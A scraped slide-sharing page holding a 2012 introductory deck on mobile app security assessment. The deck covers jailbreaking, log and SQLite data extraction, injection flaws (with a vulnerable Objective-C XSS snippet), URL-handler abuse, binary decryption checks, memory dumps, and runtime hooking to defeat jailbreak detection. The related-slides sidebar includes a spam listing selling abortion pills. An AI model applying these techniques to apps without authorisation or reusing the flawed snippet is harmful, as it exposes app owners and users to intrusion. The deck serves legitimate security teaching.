Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 

Kürzlich hochgeladen (20)

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 

Mobile Security Assessment: 101

  • 1. Intro to Mobile Security Assessment: Tools and Techniques Copyright 2012 WireHarbor Security, Inc.
  • 2. Who am I? • Founder/President - WireHarbor Security, Inc. • Previously: Led Global Application Security for F500 Insurance co. • Focus on:  Application Security, Mobile Security, Source Code Review • Partnerships:
  • 3. Agenda • Overview • Attack Vectors • Setup • Basic Techniques • Advanced Tech. • Questions
  • 4. Objectives - Security Assessment • Determine the correct path to Exploitation. • Many Attacks, Weaknesses and Impacts.
  • 5. RULE #1: Mobile Security Perform sensitive/confidential/dangerous operations OFF-DEVICE... ...also, we still can’t trust user input.
  • 6. Mobile Assessment: Key Difference • User-access to runtime environment  DEVS: **New perspective allows us to see everything you are doing** VS...
  • 7. Jailbreak vs. Rooting • Jailbreak (iOS) - Users can break out of sandbox, but are still limited by the Apple kernel. (Your iPhone is still an iPhone) • Rooting (Android) - Implement a new kernel, turn your phone into ??? I
  • 8. Attack Vectors • GSM Network • GPS • Applications (Malware) • Application Vuln’s (Objective-C) • Browser Exploits • Web Services • Bluetooth • WIFI (Rogue Access Points) • NFC/RFID
  • 9. Security Controls • Reduced Attack Surface • Code Signing/App Store Approval Process - iOS  Android is more of a free-for-all • Sandboxing • NX Memory • ASLR/PIE (compiler flag)  Rarely used in 3rd party applications • Certificate Verification • Device Encryption
  • 10. Mobile Security Assessment • Step #1 : Jailbreak • Step #2 : ??? • Step #3 : PROFIT!!!
  • 11. Jailbreak in 30 sec • DISCLAIMER: BRICK WARNING!!! • DISCLAIMER: RUNTIME PROTECTIONS BECOME NIL! • DISCLAIMER: APPSTORE DEREGULATION! • Beware of Jailbreak SCAMMERS! • iPhone Dev Team (blog.iphone-dev.org) • evad3rs Team (http://evasi0n.com/) • Android is more complicated. (SuperOneclick)  Hardware/OS/Carrier dependent
  • 12. Tools • Jailbroken/Rooted Device • Cydia Applications (tcpdump, sqlite, etc...) • Android Debug Bridge (ADB) • GDB (Runtime analysis) • IDA Pro (Binary Reverse-Engineering) • MobileSubstrate/Cycript • BurpSuite (HTTP Analysis) • Xcode/Eclipse (Custom development, binary tools)
  • 13. Finding Targets PLENTY of them out there… 650,000+ Applications in AppStore* 250,000+ listed for iPad •App Store:  ~/Music/iTunes/iTunes Media/Mobile Applications  .ipa file (zip archive) •On iOS:  /var/mobile/Applications/<UUID>/<AppName>.app/ *Source: Techcrunch, July 2012
  • 15. Mobile Hacking 101 • Gain Access • Look for interesting data  Log Files  Databases  Crash Dumps  In-Transit • Cause interesting execution  Form Input/Output  Application Redirects
  • 16. Techniques: Log File Analysis • Applications output/store lots of logging data.  ~/Library/Logs/CrashReporter/MobileDevice/<DEVICE>  /private/var/log/system.log
  • 17. Techniques: Data Storage • SQLite  “Self-contained, zero-configuration, embeddable DB” • Finding sqlite files… • Automation FTW!  find . –exec file {} ;
  • 18. Techniques: Data Storage • Pulling out data…  SELECT * FROM <table>
  • 19. Techniques: SQL Injection • Should look familiar...
  • 20. Techniques: XSS Injection • XSS is in there too...  Be careful with WebKit. (UIWebView object) “Of the 197 vulnerabilities, 142 are related to WebKit...”, ZDNet review of iOS 6 NSString *js = [[NSString alloc] initWithFormat:@”var v=”%@”;”, user]; [mywebView stringByEvauatingJavaScriptFromString:js];
  • 21. Techniques: Proxy Intercept • Certificate errors are validated.  Manually install Burpsuite cert.  http://www.tuaw.com/2011/02/21/how-to-inspect-ioss-http-traffic- without-spending-a-dime/
  • 22. Techniques: Event Handler Abuse • Apps can register their own handlers via plist files. o openURL:[NSURL URLWithString:@"myapp://?foo=urb&blerg=gah"];
  • 23. Techniques: Event Handler Abuse • Finding interesting handlers…  $> strings <target>.app/<target> | grep "://“ | grep –v “http” <string>googlegmail://</string> <string>googlegmail://</string> <string>mgc://</string> <string>currents://</string> <string>googletranslate://</string> <string>comgoogleshopper://</string> <string>comgoogleearth://</string> <string>googlelatitude://</string> <string>googlebooks://</string> <string>currents://</string>
  • 25. Advanced Techniques: Overview • Binary Decryption  API Tokens  Hard-coded Passwords • Passive/Active Fuzzing • Reverse Engineering  Token Generation Algorithms • Runtime Execution Interception/Manipulation  Interesting “hidden” methods  Web Services API’s
  • 26. Advanced Techniques: Objective-C (iOS) Primer • Abstraction of Standard C  Based on Smalltalk  Designed to be “Object-oriented easy.”  The good old days: Buffer Overflows, Format Strings, etc... RETURN!!!
  • 27. Advanced Techniques: iOS Binary Inspection • Object File display tool - otool (Xcode)  Display file headers (Mach-O and Universal)  Display Crypt segment info  Dump machine code  List Shared Libraries • ARM Processors  RISC instruction set  Little-endian representation
  • 28. Advanced Techniques: iOS Binary Inspection • Universal Binaries  Contain multiple versions o otool –f <file>  May be encrypted o otool –l <file> | grep LC_ENCRYPTION_INFO –B1 –A4
  • 29. Advanced Techniques: iOS Runtime Inspection • Anti-Debugging (The Anti-BYOD part)  ptrace PT_DENY_ATTACH  sysctl check  Known files  Binary Packing  Code Checksums  Driver Checks  Timing Measurements  Code Obfuscation  Junk Code
  • 30. Advanced Techniques: iOS Runtime Inspection • GDB  Execute/load binary  Breakpoint on start address 0x2000 (PIE may cause this to move on you) gdb $> dump memory <filename> <start address> <end address>
  • 31. Advanced Techniques: iOS Binary Inspection, Unencrypted • IDA Pro Binary graphing/analysis…
  • 32. IDA Pro: What to look for? • Using the Apple DEV reference  File Writes  Network Connections  Keychain Access  UI Form Fields
  • 33. Advanced Techniques: iOS Runtime Manipulation • Cycript - Javascript/Obj-C Interpreter  Hook active apps via Mobile Substrate  Interact with binaries in runtime using JS http://www.cycript.org/ http://iphonedevwiki.net/index.php/Cycript_Tricks
  • 34. • Example: cy# [SBAwayController.sharedAwayController isPasswordProtected] 1 cy# [[UIApp.keyWindow recursiveDescription] <KHWindow: 0x1517a0; baseClass = UIWindow; frame = (0 0; 320 480); opaque = NO; autoresize = RM+BM; layer = <CALayer: 0x151640>> | <UIView: 0x17a120; frame = (0 20; 320 460); autoresize = W+H; layer = <CALayer: 0x17a1b0>> | | <UIToolbar: 0x17a3f0; frame = (0 416; 320 44); autoresize = W+TM; layer = <CALayer: 0x17a0d0>> | | | <UIToolbarButton: 0x17d150; frame = (12 0; 26 44); alpha = 0.25; opaque = NO; layer = <CALayer: 0x17d2e0>> | | | | <UISwappableImageView: 0x17d4c0; frame = (0 7; 26 27); opaque = NO; userInteractionEnabled = NO; layer = <CALayer: 0x17d570>> | | | <UIToolbarButton: 0x17d340; frame = (153 0; 26 44); opaque = NO; layer = <CALayer: 0x14a220>> | | | | <UISwappableImageView: 0x17a680; frame = (0 7; 26 27); opaque = NO; userInteractionEnabled = NO; layer = <CALayer: 0x17a6e0>> | | | <UIToolbarButton: 0x17df40; frame = (222 0; 18 44); opaque = NO; layer = <CALayer: 0x17d2b0>> | | | | <UISwappableImageView: 0x17dbf0; frame = (3 13; 18 19); opaque = NO; userInteractionEnabled = NO; layer = <CALayer: 0x17d3f0>> Advanced Techniques: iOS Runtime Manipulation
  • 35. Advanced Techniques: Fuzzing • Custom scripts… (Python, Ruby, Javascript) • Dumb or Smart  Mutation-Based: Randomly substitute data.  Generation-Based: Substitute based off RFC or Standards. • Classic Targets  Any file types. (PDF, PPT, etc…)  Protocols (HTTP, SMS, Push Notifications, etc...)  Image formats (PNG, TIFF, etc…)
  • 36. Passive Fuzzing - iOS • Using MobileSubstrate:
  • 37. • What can we do with this?  Application Tracing/Logging (filesystem, network, etc...)  Turn off Jailbreak detection  Fake GPS data... (think: location-aware security)  The possibilities get scarier as trust grows... Advanced Techniques: iOS Runtime Manipulation
  • 38. Trey Keifer 847-239-5626 trey.keifer@wireharbor.com Twitter: @wireharbor Facebook: facebook.com/wireharbor http://www.wireharbor.com THANK YOU!!!